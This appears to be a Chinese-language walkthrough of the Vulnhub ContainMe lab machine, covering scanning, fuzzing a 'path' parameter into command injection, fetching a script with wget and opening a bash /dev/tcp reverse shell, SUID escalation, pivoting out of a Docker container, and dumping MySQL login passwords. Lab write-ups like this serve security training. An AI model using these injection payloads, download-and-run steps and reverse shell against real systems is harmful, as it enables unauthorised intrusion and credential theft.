Vulnhub系列靶机---THM-ContainMe-v4

文章目录

      • 信息收集
      • 漏洞利用
        • 模糊测试 fuzz ?
      • 容器内提权
      • 容器外提权

靶机地址:ContainMe: 1

下载地址:THM-ContainMe-v4.ova (Size: 2.2 GB)
难易程度:

信息收集

主机发现

sudo arp-scan -l   

Vulnhub系列靶机---THM-ContainMe-v4_第1张图片

端口扫描

sudo nmap -A -p- 192.168.8。9

Vulnhub系列靶机---THM-ContainMe-v4_第2张图片

目录扫描

sudo dirb http://192.168.8.9

Vulnhub系列靶机---THM-ContainMe-v4_第3张图片

dirsearch -u 192.168.8.9 -i 200

Vulnhub系列靶机---THM-ContainMe-v4_第4张图片

发现三个文件index.php,index.html,info.php

依次访问看一下

index.html

Vulnhub系列靶机---THM-ContainMe-v4_第5张图片


info.php

Vulnhub系列靶机---THM-ContainMe-v4_第6张图片

返回了php探针


index.php

Vulnhub系列靶机---THM-ContainMe-v4_第7张图片

页面结果好像执行了ls -la命令

查看页面源代码:

Vulnhub系列靶机---THM-ContainMe-v4_第8张图片

漏洞利用

模糊测试 fuzz ?

什么是fuzz

什么是模糊测试?

wfuzz使用1

wfuzz使用2

wfuzz自动字典位置/usr/share/wfuzz/wordlist

wfuzz -c -u http://192.168.80.139/index.php?FUZZ=../../../../../../etc/passwd -w /usr/share/wfuzz/wordlist/general/common.txt --hh 329

发现了参数path,手动确认一下:

http://192.168.80.139/index.php?path=/etc/passwd

Vulnhub系列靶机---THM-ContainMe-v4_第9张图片

Vulnhub系列靶机---THM-ContainMe-v4_第10张图片

http://192.168.8.9/index.php?path=/etc

Vulnhub系列靶机---THM-ContainMe-v4_第11张图片

http://192.168.8.9/index.php?path=;id

Vulnhub系列靶机---THM-ContainMe-v4_第12张图片

发现确实存在命令执行漏洞

查看那个目录可以写入文件

http://192.168.8.9/index.php?path=;%20ls%20-l%20%20/

Vulnhub系列靶机---THM-ContainMe-v4_第13张图片

kali上开启http服务

python -m http.server 80

Vulnhub系列靶机---THM-ContainMe-v4_第14张图片

写一个反弹shell

#!/bin/bash
# code.sh
bash -i &> /dev/tcp/192.168.8.8/6868 0>&1;

在地址栏中输入

http://192.168.8.9/index.php?path=;wget -P /tmp 192.168.8.8/code.sh;ls -la /tmp;

Vulnhub系列靶机---THM-ContainMe-v4_第15张图片

写入脚本文件后在kali端开启对6868端口的监听

nc -lvp 6868

Vulnhub系列靶机---THM-ContainMe-v4_第16张图片

然后利用命令执行漏洞使用bash进行执行code.sh文件,命令:bash /tmp/code.sh,成功获得shell权限

Vulnhub系列靶机---THM-ContainMe-v4_第17张图片

容器内提权

查看是否有能以root身份执行的文件

 sudo -l

Vulnhub系列靶机---THM-ContainMe-v4_第18张图片

查看/home

Vulnhub系列靶机---THM-ContainMe-v4_第19张图片

  find / -user root -perm /4000 2>/dev/null

Vulnhub系列靶机---THM-ContainMe-v4_第20张图片

发现mike用户家目录下的1cryptupx和使用find命令查看出来的suid中都有类似的crypt

那就cd /usr/share/man/zh_TW/ 执行该crypt文件,看看效果

Vulnhub系列靶机---THM-ContainMe-v4_第21张图片

Vulnhub系列靶机---THM-ContainMe-v4_第22张图片

拿到交互shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

拿到root后,并没有拿到真正的权限,而在处在Docker容器里

Vulnhub系列靶机---THM-ContainMe-v4_第23张图片

容器外提权

扫描存活的主机

for i in {1..254} ;do (ping 172.16.20.$i -c 1 -w 5 >/dev/null && echo "172.16.20.$i" &) ;done

image-20230916201003072

扫描端口

for port in {1..65535}; do
   echo >/dev/tcp/172.16.20.6/$port &&
     echo "port $port is open"
 done 2>/dev/null |grep open

Vulnhub系列靶机---THM-ContainMe-v4_第24张图片

利用ssh密钥登陆到mike用户上

Vulnhub系列靶机---THM-ContainMe-v4_第25张图片

Vulnhub系列靶机---THM-ContainMe-v4_第26张图片

Vulnhub系列靶机---THM-ContainMe-v4_第27张图片

查看开放的端口

Vulnhub系列靶机---THM-ContainMe-v4_第28张图片

连接Mysql

Vulnhub系列靶机---THM-ContainMe-v4_第29张图片

获取数据

Vulnhub系列靶机---THM-ContainMe-v4_第30张图片

+-------+---------------------+
| login | password            |
+-------+---------------------+
| root  | bjsig4868fgjjeog    |
| mike  | WhatAreYouDoingHere |
+-------+---------------------+

Vulnhub系列靶机---THM-ContainMe-v4_第31张图片

你可能感兴趣的:(#,Vulnhub靶机系列,vulnhub,网络安全,web安全,安全)